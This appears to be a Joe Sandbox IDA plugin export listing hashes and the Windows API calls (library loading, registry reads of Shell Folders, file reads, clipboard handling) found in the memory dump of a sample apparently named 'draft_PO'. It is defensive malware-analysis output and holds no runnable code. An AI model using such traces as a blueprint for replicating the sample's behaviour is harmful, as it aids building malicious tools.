                                                                                • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                APIs
                                                                                • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                APIs
                                                                                • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: EnumNamesResource
                                                                                • String ID:
                                                                                • API String ID: 3334572018-0
                                                                                • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                APIs
                                                                                • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                APIs
                                                                                • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CloseFind
                                                                                • String ID:
                                                                                • API String ID: 1863332320-0
                                                                                • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Open
                                                                                • String ID:
                                                                                • API String ID: 71445658-0
                                                                                • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                APIs
                                                                                • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                                • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                • Opcode Fuzzy Hash: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                                • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004095FC
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                  • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                • String ID:
                                                                                • API String ID: 3655998216-0
                                                                                • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                                                • Instruction ID: 56811e6a31311fae19106e74f332fd481794b0d175407c03959d21f12539f693
                                                                                • Opcode Fuzzy Hash: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                                                • Instruction Fuzzy Hash: 4201E572109E01E6DB1029278C81AF766899FC0399F14016FF94886281EEA8EEC542AE
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00445426
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                • String ID:
                                                                                • API String ID: 1828521557-0
                                                                                • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                APIs
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                  • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@FilePointermemcpy
                                                                                • String ID:
                                                                                • API String ID: 609303285-0
                                                                                • Opcode ID: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                                • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                • Opcode Fuzzy Hash: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                                • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsicmp
                                                                                • String ID:
                                                                                • API String ID: 2081463915-0
                                                                                • Opcode ID: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                                • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                • Opcode Fuzzy Hash: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                                • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                APIs
                                                                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseCreateErrorHandleLastRead
                                                                                • String ID:
                                                                                • API String ID: 2136311172-0
                                                                                • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                APIs
                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@??3@
                                                                                • String ID:
                                                                                • API String ID: 1936579350-0
                                                                                • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: free
                                                                                • String ID:
                                                                                • API String ID: 1294909896-0
                                                                                • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: free
                                                                                • String ID:
                                                                                • API String ID: 1294909896-0
                                                                                • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: free
                                                                                • String ID:
                                                                                • API String ID: 1294909896-0
                                                                                • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                                • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                                                                                APIs
                                                                                • EmptyClipboard.USER32 ref: 004098EC
                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                • GetLastError.KERNEL32 ref: 0040995D
                                                                                • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                • GetLastError.KERNEL32 ref: 00409974
                                                                                • CloseClipboard.USER32 ref: 0040997D
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                • String ID:
                                                                                • API String ID: 3604893535-0
                                                                                • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                • API String ID: 2780580303-317687271
                                                                                • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                APIs
                                                                                • EmptyClipboard.USER32 ref: 00409882
